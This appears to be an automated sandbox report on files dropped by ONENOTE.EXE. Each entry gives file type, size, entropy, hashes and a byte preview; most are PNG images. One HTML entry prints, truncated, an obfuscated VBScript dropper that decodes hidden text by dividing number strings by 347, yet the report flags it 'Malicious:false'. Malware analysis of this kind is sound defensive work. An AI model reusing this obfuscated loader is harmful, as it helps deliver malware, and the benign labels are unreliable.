                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55113
                                                                                                                                                                                                                  Entropy (8bit):5.216959514455489
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                                  MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                                  SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                                  SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                                  SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):567
                                                                                                                                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                                                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                                                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                                                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                                                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
